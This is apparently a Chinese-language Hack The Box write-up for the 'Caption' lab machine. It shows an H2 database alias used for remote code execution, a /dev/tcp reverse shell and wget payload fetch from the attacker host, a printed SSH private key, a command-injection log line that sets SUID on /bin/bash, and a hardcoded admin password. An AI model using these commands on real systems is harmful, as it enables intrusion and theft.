HacktheBox-Caption

Natro922024-09-162024-09-16

信息搜集

10.10.11.33:22 open
10.10.11.33:80 open
10.10.11.33:8080 open
[*] alive ports len is: 3start vulscan
[*] WebTitle http://10.10.11.33        code:301 len:0      title:None 跳转url: http://caption.htb
[*] WebTitle http://10.10.11.33:8080   code:200 len:7191   title:GitBucket

8080 GitBucket

exploits/GitBucket/gitbucket-unauthenticated-rce.md at master · kacperszurek/exploits

发现有目录：http://caption.htb:8080/、http://caption.htb:8080/root后者直接跳转到 root 用户，但是仍然需要验证。

http://caption.htb:8080/root.atom文件泄露：

<?xml version="1.0" encoding="UTF-8"?>
<feed xmlns="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/" xml:lang="en-US">
  <id>tag:caption.htb,2013:gitbucket</id>
  <title>GitBucket's activities</title>
  <link type="application/atom+xml" rel="self" href="http://caption.htb:8080/activities.atom"/>
  <author>
    <name>GitBucket</name>
    <uri>http://caption.htb:8080</uri>
  </author>
  <updated>2024-09-16T05:23:03Z</updated>

</feed>

测试了一下发现是弱口令：root:root

下面有两个仓库：/root/Logservice、root/Caption-Portal

然后在右上角用户管理处中能发现管理面板：/admin/users

发现有数据库管理位置：/admin/dbviewer，报错发现数据库是 h2：

H2 数据库 RCE

Chaining Vulnerabilities in H2 Database for RCE | by Nairuz Abulhul | R3d Buck3T | Medium

1	SELECT FILE_READ('/etc/passwd', NULL);

能读，但是不完全能读，

之前在羊城杯里面遇到过 h2 数据库的 RCE。

2024 羊城杯初赛部分题目WP

可以通过编写 Java 代码实现自定义数据库函数。

CREATE ALIAS NATRO92 AS $$ String shellexec(String cmd) throws java.io.IOException {
    java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A");
    return s.hasNext() ? s.next() : "";
}$$;

然后就可以 RCE：

1	CALL NATRO92('id')

发现有 margo 用户，反弹出 shell。直接弹 shell 似乎是不行的，只能这样传 shell 文件再反弹。

# 写入文件 shell.sh 并挂载
bash -i >& /dev/tcp/10.10.14.22/7777 0>&1
python3 -m http.server 80

CALL NATRO92('wget -O /tmp/natro92.sh http://10.10.14.22/shell.sh')
CALL NATRO92('chmod +x /tmp/natro92.sh');
CALL NATRO92('bash /tmp/natro92.sh');

虽然我觉得这个也不是预期结果，因为这个对于一个 Hard 靶机来说似乎有点过于简单了 O.o。

thrift PE

权限稳定下。把 ssh 文件下下来

CALL NATRO92('cat .ssh/id_ecdsa');
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAaAAAABNlY2RzYS1zaGEy
LW5pc3RwMjU2AAAACG5pc3RwMjU2AAAAQQQ1SM7z6j9c2tRnzil0l0IYWiMdCW1EbbmLEh1VtEw9
xlimkCfS2HkRXlK+L+P+kIaSjU/dtffZ7lYsUqVU0+WTAAAAoPk+TRj5Pk0YAAAAE2VjZHNhLXNo
YTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDVIzvPqP1za1GfOKXSXQhhaIx0JbURtuYsSHVW0
TD3GWKaQJ9LYeRFeUr4v4/6QhpKNT92199nuVixSpVTT5ZMAAAAhAOoMh9nwyHpHj/g4H0w967UF
vJX7WQ4wIONFojx14tPgAAAAAAECAwQFBgc=
-----END OPENSSH PRIVATE KEY-----

注意这里 cat 出来的很有可能报错，需要格式化下。

natro92/format_ssh_key_file: format ssh key file. (github.com)

1	Load key "id_rsa": error in libcrypto

格式化之后记得赋值权限。

1 2	chmod 600 id_ecdsa ssh -i id_ecdsa margo@10.10.11.33

但是到后面传了 linpeas 也没啥想法。

我们重新返回 git 仓库到 LogService 的仓库，发现是 go 语言编写的。并且调用了 thrift 这个库，说明有 thrift 服务。根据服务可以发现运行在了 9090 端口。

Apache Thrift - Python

将 logservice 库 clone 到 margo 的 home 下。然后在目录下运行：

1	thrift --gen py log_service.thrift

然后将文件下载到本地，这里本来想多熟悉熟悉 msf 上个马，但是这里一直报错：

懂得师傅可以在评论说下为什么。，那就用 scp 下载到本地。

1	scp -i id_ecdsa margo@10.10.11.33:/home/margo/Logservice/log_service.thrift ./log_service.thrift

然后用 apt 安装 thrift 库，再把 9090 端口代理出来：

1	ssh -i id_ecdsa -L 9090:127.0.0.1:9090 margo@10.10.11.33

再去靶机处创建一个 log 文件：

vim /tmp/evil.log
# 写入恶意利用日志
127.0.0.1 "user-agent":"'; /bin/bash /tmp/evil-natro92.sh #"
# 再写入 evil-natro92.sh 为了赋予 /bin/bash所有者root权限
chmod +s /bin/bash

再回到本地，运行：

1
2
3

thrift -r --gen py log_service.thrift
cd gen-py
vim client.py

将下面的内容保存到 client.py 中，然后再运行 client.py 文件。

from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from log_service import LogService

def main():
    transport = TSocket.TSocket('127.0.0.1', 9090)
    transport = TTransport.TBufferedTransport(transport)
    protocol = TBinaryProtocol.TBinaryProtocol(transport)
    client = LogService.Client(protocol)
    transport.open()
    try:
        response = client.ReadLogFile("/tmp/evil.log")
    except Exception as e:
        print(f"Error: {e}")
    finally:
        transport.close()

if __name__ == "__main__":
    main()

返回到靶机的 ssh 链接，然后运行/bin/bash -p

Beyond Root

User 这部分似乎是非预期，我们可以看到除了 margo 这个用户之外还有一个 ruth 用户。在 home 下有一个 bot.py：

import sys
import requests
import subprocess
from time import sleep
from bs4 import BeautifulSoup
from seleniumwire import webdriver

def cache_automation(ip):
        option = webdriver.ChromeOptions()
        option.add_argument('--no-sandbox')
        option.add_argument('--headless')
        option.add_argument("--remote-debugging-port=34572")
        driver = webdriver.Chrome(options=option)
        print('[*] Starting Browsing as Admin')
        r = requests.post(
                'http://caption.htb/',
                data={
                        'username':'admin',
                        'password':'cFgjE@0%l0'
                },
                allow_redirects=False
                )
        cookie = r.headers['Set-Cookie'].split(';')[0].split('=')[1]
        driver.get('http://caption.htb')
        driver.add_cookie({"name": "session", "value": "%s"%(cookie)})
        r = requests.get(f'http://caption.htb/firewalls?ip={ip}',cookies={'session':cookie})
        soup = BeautifulSoup(r.text,"html.parser")
        try:
                link=soup.find_all('script')[1]['src'].split('?')[1]
                if 'internal-proxy.local' in link:
                        print(f"[!] Request not poisoned yet - {link}")
                        driver.close()
                        driver.quit()
                else:
                        print(f'[+] Request is cached - {link}')
                        driver.get(f'http://caption.htb/firewalls?ip={ip}')
                        print('[*] Browsed to the firewall page')
                        driver.close()
                        driver.quit()
        except:
               pass

cache_automation(sys.argv[1])

很显然这个是一个 xss Bot。不断用带着 Admin 的 cookie 的 bot 访问/firewalls这个路由。

然后目录下另一个varnish_logs.sh运行 bot：

#!/bin/bash

read_output() {
    while read -r line; do
        if [[ -n "$line" ]];then
            python3 /home/ruth/bot.py "$line"
  fi
    done
}

varnishncsa -c -F "%{VCL_Log:client_ip}x" | read_output

而这个 carnishncsa 是一个记录 Varnish 的访问日志。

如果我们这里自定义一个请求种类NATROISBEST发送出去，如果你运行 varnishncsa 的监控是可以接收到的。

# remote
varnishncsa -c -F "%{%Y-%m-%d %H:%M:%S}t %h %m %U %H %s %b %{VCL_Log:client_ip}x %D"
# kali
curl caption.htb -X NATROISBEST

但是这个 app 里面的 py 文件需要先读取到才能知道，这个需要有 margo 权限，而且在仓库里面并未提供。

@app.route('/firewalls')
@login_required
def firewall():
    try:    return render_template('firewall.html',host=request.headers['X-Forwarded-Host'])
    except: return render_template('firewall.html',host='internal-proxy.local')

由于我对 XSS 就是个彩笔，这里引用下别人的 payload：

1	./templates/firewall.html:12:<script src="http://caption.htb/static/js/lib.js?utm_source=http://{{host\|safe}}"></script>

但是那个/download路由下载有限制。这部分说实话感觉没有逻辑没法合理拼接，等等后面的 wp 在看看吧。

盘外招

GitHub - natro92/HacktheBoxPrivExp: A personal exp base to HacktheBox

caption.htb

admin:cFgjE@0%l0

user 的 id 一直在变。